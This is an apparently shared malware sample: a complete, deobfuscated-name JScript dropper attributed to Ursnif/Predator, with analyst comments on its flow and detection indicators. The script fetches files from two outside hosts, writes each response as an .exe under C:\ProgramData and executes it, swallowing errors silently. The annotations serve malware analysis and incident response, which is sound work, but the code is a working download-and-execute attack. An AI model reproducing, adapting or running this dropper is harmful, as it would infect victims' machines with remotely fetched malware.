ps66uk

js-dropper-001

Oct 8th, 2019
  1. // #ursnif #predator dropper
  2. // from https://app.any.run/tasks/f6eec462-6b4c-43a8-89ce-0749f0a2a77e/
  3.  
  // Seven strings that the loop at the end of the script passes, one at a time, to the download-and-run function below.
  // Entries 0-2 are "404" paths on Microsoft and Trend Micro sites, and entries 3-4 are not URLs at all. The function only writes a file on HTTP 200 and swallows every exception, so these entries presumably act as filler/noise (analyst inference, not shown by the code).
  // Entries 5-6 are the only ones on other hosts; handle them as the network indicators of this sample.
  4. var c81a84500ed1b00245d5915b6f378c4b9 = ['https://docs.microsoft.com/en-us/aspnet/index/404', 'https://docs.microsoft.com/en-us/office/index/404', 'https://www.trendmicro.com/de_de/404.html', '4IGng/0ZfL57M', '', 'http://sogrospina.com/angosz/cecolf.php?l=allix1.tar', 'http://thachastew.com/Lwos.php'];
  5.  
  // Download-and-run routine (analyst annotation). The single parameter is the string to fetch.
  // Flow: HTTP GET through MSXML2.XMLHTTP -> on status 200 the response body is written to
  // C:\ProgramData\204<n>.exe through ADODB.Stream -> the saved path is handed to Shell.Application.Open.
  // Returns nothing; every exception is swallowed by the empty catch, so a failed attempt leaves no error output.
  // Detection view: a Windows Script Host process (the script relies on the WScript object) making an outbound
  // HTTP request and then creating an .exe under C:\ProgramData whose name matches 204 followed by 0-103.
  6. function c5e48828ccea2a557e05addda6e8a356c(c920de1499def1eaca0fc3daa89faaf36){
  7.         try{
             // HTTP client COM object; the third Open argument (false) makes the request synchronous,
             // so Send() blocks until the response has arrived.
  8.         var c06366560112cb267da2b804c02434d31 = WScript.CreateObject('MSXML2.XMLHTTP');
  9.         c06366560112cb267da2b804c02434d31.Open('GET', c920de1499def1eaca0fc3daa89faaf36, false);
  10.         c06366560112cb267da2b804c02434d31.Send();
  11.  
             // Integer in 0..103, drawn anew on every call: it becomes the variable part of the file name,
             // so successive calls can write different files.
  12.         var ccb2ed58980ab60a3e21e23f385a6a6dd = Math.round(Math.random() * 103);
  13.  
             // Only an HTTP 200 reaches the write path; the "404" entries in the list produce no file.
  14.         if (c06366560112cb267da2b804c02434d31.Status == 200)
  15.         {
                 // ADODB.Stream in binary mode (Type = 1) receives the raw response bytes;
                 // Position is reset to 0 so the whole buffer is saved.
  16.             var cedd9f28b97948c82c3a1374834be6825 = WScript.CreateObject('ADODB.Stream');
  17.  
  18.             cedd9f28b97948c82c3a1374834be6825.Open();
  19.             cedd9f28b97948c82c3a1374834be6825.Type = 1;
  20.             cedd9f28b97948c82c3a1374834be6825.Write(c06366560112cb267da2b804c02434d31.ResponseBody);
  21.             cedd9f28b97948c82c3a1374834be6825.Position = 0;
  22.  
                 // A file already present under the chosen name is deleted before saving.
  23.             var cab6a85a7de6f8c8b456daa68bd3d4961 = WScript.CreateObject('Scripting.FileSystemObject');
  24.             if (cab6a85a7de6f8c8b456daa68bd3d4961.FileExists('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe'))
  25.             {
  26.                 cab6a85a7de6f8c8b456daa68bd3d4961.DeleteFile('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe');
  27.             }
  28.  
                 // Second SaveToFile argument 2 = overwrite if the file exists.
                 // The body is saved as received: nothing here checks its content, type or size.
  29.             cedd9f28b97948c82c3a1374834be6825.SaveToFile('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe', 2);
  30.             cedd9f28b97948c82c3a1374834be6825.Close();
  31.  
                 // The saved path goes to Shell.Application's Open method; presumably this is what starts
                 // the dropped file (the result is not visible in this listing).
  32.             (new ActiveXObject("Shell.Application").Open("C:\\ProgramData\\204" + ccb2ed58980ab60a3e21e23f385a6a6dd + ".exe"));
  33.  
  34.         }
  35.  
             // Empty catch: request, COM and file errors all vanish silently, which also covers
             // the list entries that are not valid URLs.
  36.         }catch(e){}
  37. }
  38.  
  // Driver loop (analyst annotation): walks the string list in index order and calls the download-and-run
  // function on each entry. There is no break, so every entry is attempted even after an earlier one succeeded.
  // For scoping an incident: one run can produce several outbound requests and more than one file on disk.
  39. for(var cd62a3ae55404f7d993846e953694ff01 = 0; cd62a3ae55404f7d993846e953694ff01 < c81a84500ed1b00245d5915b6f378c4b9.length; cd62a3ae55404f7d993846e953694ff01++){
  40.  
         // The wrapper function is invoked on the very next line, so it adds no behaviour of its own.
  41.     var c66d5f0ffe276525f3b2df450f48f1d96 = function() {c5e48828ccea2a557e05addda6e8a356c(c81a84500ed1b00245d5915b6f378c4b9[cd62a3ae55404f7d993846e953694ff01])};
  42.     c66d5f0ffe276525f3b2df450f48f1d96();
         // Fixed pause of 4603 ms after every attempt, whether or not it wrote a file.
  43.     WScript.Sleep(4603);
  44.  
  45. }